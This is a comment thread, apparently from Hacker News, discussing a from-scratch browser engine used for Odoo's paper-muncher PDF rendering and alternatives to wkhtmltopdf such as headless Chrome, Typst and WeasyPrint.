What’s the long term goal of this project beyond learning? Building a browser to support the modern web is a humongous work IMHO.
What’s the long term goal of this project beyond learning? Building a browser to support the modern web is a humongous work IMHO.
The main goal is great support for static documents rendering as it's being used at the core of the paper-muncher [1] PDF rendering engine, meant to replace wkhtmltopdf at odoo. But we don't exclude general web browsing and JavaScript support at some point.
[1] https://github.com/odoo/paper-muncher
Ooh blast from the past!
At a previous company we moved off of wkhtmltopdf to a nodejs service which received static html and rendered it to pdf using phantomjs. These days you probably use puppeteer.
The trick was keeping the page context open to avoid chrome startup costs and recreating `page`. The node service would initialize a page object once with a script inside which would communicate with the server via a named Linux pipe. Then, for each request:
1. node service sends the static html to the page over the pipe
2. the page script receives the html from the pipe, inserts it into the DOM, and sends an “ack” back over the pipe
3. the node service receives the “ack” and calls the pdf rendering method on the page.
I don’t remember why we chose the pipe method: I’m sure there’s a better way to pass data to headless contexts these days.
The whole thing was super fast(~20ms) compared to WK, which took at least 30 seconds for us, and would more often than not just time out.
Sounds like fun considering how real the problem is.
It was!
I remember the afternoon I had the idea: it was beer Friday -and it took a few hours to write up a basic prototype that rendered a PDF in a few hundred milliseconds. That was the first time I’d written a 100x speed improvement. Felt like a real rush.
Congratulations. Doesn't make this approach make so much more sense than writing a browser engine from scratch?
Maybe? I'd say it depends on what you're rendering. We rendered HTML that we created ourselves, filled in with data that we parsed and validated. Styles across the documents generated were also largely the same.
If your job is to render arbitrary user HTML, this could get much more hairy. First of all, print rendering at the time(and probably now) was notoriously finicky. Things like adjusting colors, improper rendering of SVGs, pagination were difficult. It took a lot of effort to get right.
Furthermore, if you're sending arbitrary HTML, you now have a much larger security exploit surface. If someone figures out how to call `addEventListener` within the page context, they can snoop on every PDF generated by that page.
At work we recently switched from Wkhtmltopdf to Typst, which is a breath of fresh air. It is very fast and generates PDFs from scratch without needing to involve HTML or a browser engine. It is implemented in Rust and distributed as a self-contained binary.
This blog post convinced us that the switch was worth it: https://zerodha.tech/blog/1-5-million-pdfs-in-25-minutes/
Oh interesting. I use their "old stack" for a couple of much smaller projects and it works fine, but it does seem a bit ridiculous to be starting up a whole chrome instance just to convert one file format to another.
I also love Typst and use it regularly. But just to note it : there is also https://weasyprint.org that takes HTML as input
So cool to see Odoo mentioned on HN. I've worked with it before and like it a lot.
I've made posts about it on HN before but they've never gained traction. I hope that this takes off.
You guys make neat software.
Does it support page margin boxes?
Yes !
Looks like skift is a hobby os like Serenity OS which Ladybird is spun out from. Maybe they intend to follow the same path?
I intend to keep Skift and Vaev together for as long as possible since everything is meant to be cross-platform. I don’t see any architectural conflict that would motivate such a change.